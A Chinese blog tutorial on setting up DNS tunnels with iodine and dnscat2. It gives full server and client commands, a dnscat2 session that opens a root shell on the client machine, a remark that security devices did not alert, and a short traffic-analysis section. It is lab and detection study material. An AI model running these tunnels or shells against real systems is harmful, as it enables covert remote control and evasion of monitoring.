1.域名準備
選擇哪家的云都沒問題,國內云需要實名,不建議使用,這里我選擇的TX云,因為之前注冊過了,自己拿來做個流量分析不成問題
域名添加決議記錄
需要準備自己的vps作為DNS隧道的服務端,且需要添加ns記錄
2.iodined搭建
關閉53埠關閉開機自啟
systemctl stop systemd-resolved
systemctl disable systemd-resolved
之后53埠已關閉
啟動服務端
iodined -f -c -P 1qaz@WSX 192.168.100.1 ns.xxx.xyz -DD引數說明
-f:在前臺運行
-c:禁止檢查所有傳入請求的客戶端IP地址,
-P:客戶端和服務端之間用于驗證身份的密碼,
-D:指定除錯級別,-DD指第二級,“D”的數量隨級別增加,
客戶端
iodine -f -P 1qaz@WSX ns.aligoogle.xyz -M 200
客戶端連接正常,且服務端顯示客戶端連接成功
【----幫助網安學習,以下所有學習資料免費領!加vx:yj009991,備注 “博客園” 獲取!】
① 網安學習成長路徑思維導圖
② 60+網安經典常用工具包
③ 100+SRC漏洞分析報告
④ 150+網安攻防實戰技術電子書
⑤ 最權威CISSP 認證考試指南+題庫
⑥ 超1800頁CTF實戰技巧手冊
⑦ 最新網安大廠面試題合集(含答案)
⑧ APP客戶端安全檢測指南(安卓+IOS)
查看客戶端網卡,因為配置的時候一直不太穩定,所以這里服務端分配的虛擬網卡我更換為了192.168.121.1
測驗隧道是否通信
延時比較高,也不穩定,
通過隧道連接目標主機
ssh -p 2222 [email protected]
這里我換ssh的埠了
但是發現安全設備在連接高危埠的時候無告警
3.流量分析
抓取dns0網卡的流量
tcpdump -i dns0 port 53 -w file.pcap
引數-i 指定網卡, port 指定埠,DNS使用53埠,-w 寫入檔案,
查看日志發現所有的流量都是DNS日志,但是目的都為自己的VPS
其實能夠根據流量特征識別工具型別,
4.試錯
本來我是想使用穿透工具通過隧道穿透的,這里使用nps做隧道走socks,想走虛擬網卡需要修改nps組態檔
./npc -server=192.168.120.1:63323 -vkey=n4jg3lrvg19qlqth -type=tcp查看nps上線后,需要做埠轉發,不做埠轉發無法直接使用虛擬地址的隧道,這里其實沒有這么走的意義
但是這里發現行不通,參考了一些文章,發現某位師傅寫的有點兒問題,這里大可不必,沒有所謂的套層+轉口轉發,單一走隧道都不穩定以及卡的要死,怎么玩兒套娃,
5. dnscat2搭建
安裝準備
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server/
curl -sSL https://get.rvm.io | bash
source /etc/profile.d/rvm.sh
rvm install 2.6.0
source /etc/profile.d/rvm.sh
rvm use 2.6.0
gem install bundler
bundle install
ruby ./dnscat2.rb
需要注意這里開放vps的53的udp埠
firewall-cmd --zone=public --add-port=53/udp --permanent
firewall-cmd --reload國內服務器TX云的話需要更換源,下載檔案需要kexue上網,境內下載tools找不到服務
客戶端
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/client/
make
?
./dnscat --dns server=IP,port=53 --secret=f361f307f523b07352d0bab1b765a888 //直連模式
./dnscat --dns server=ling.domain --secret=1qaz2wsx //中繼模式直連模式
Server:
Client:
中繼模式
ruby ./dnscat2.rb ns.domain -e open -c 1qaz2wsx --no-cache
客戶端
./dnscat --dns domain=ling.domain --secret=1qaz2wsx
./dnscat --dns server=www.domain --secret=1qaz2wsx 
服務端命令
sessions 列出所有session
session -i 2 進入session 2
shell:創建互動式shell
suspend:回傳上一層
exit:退出
clear(清屏)
delay(修改遠程會話超時時間)
exec(執行遠程機上的程式)
shell(得到一個反彈shell,此處必須在1::command(kali)中使用)
download/upload(兩端之間上傳下載檔案)
listen <本地埠> <控制端IP/127.0.0.1>:<埠>(埠轉發,此處)(此處必須在1::command(kali)中使用)dnscat2> session -i 1
New window created: 1
history_size (session) => 1000
Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
This is a command session!
?
That means you can enter a dnscat2 command such as
'ping'! For a full list of clients, try 'help'.
?
command (ubuntu) 1> whoami
Error: Unknown command: whoami
command (ubuntu) 1> shell
Sent request to execute a shell
command (ubuntu) 1> New window created: 2
Shell session created!
whoami
Error: Unknown command: whoami
command (ubuntu) 1> session -i 2
New window created: 2
history_size (session) => 1000
Session 2 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
This is a console session!
?
That means that anything you type will be sent as-is to the
client, and anything they type will be displayed as-is on the
screen! If the client is executing a command and you don't
see a prompt, try typing 'pwd' or something!
?
To go back, type ctrl-z.
?
sh (ubuntu) 2> whoami
sh (ubuntu) 2> root
tcpdump -i dns0 port 53 -w file.pcap
流量包內的資料內容
請求包和回包區別不大,在回傳包多了域名的資訊的TXT記錄加密傳輸資訊,可以看到DNS的查詢請求的域名資訊前的一串資料,里面就是加密過后的互動資料,
6 其它工具
跟工具關系不大,隧道的話DNS只要ip和域名沒標簽,其實走的都是udp的協議,所以在安全設備上都是流量資料,其類似的工具有dns2tcp等,但是總體來講該隧道比較慢不穩定,比較慢且傳輸不支持大流量傳輸,
更多網安技能的在線實操練習,請點擊這里>>
合天智匯:合天網路靶場、網安實戰虛擬環境
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/554068.html
標籤:其他
上一篇:5.4 執行緒池
下一篇:返回列表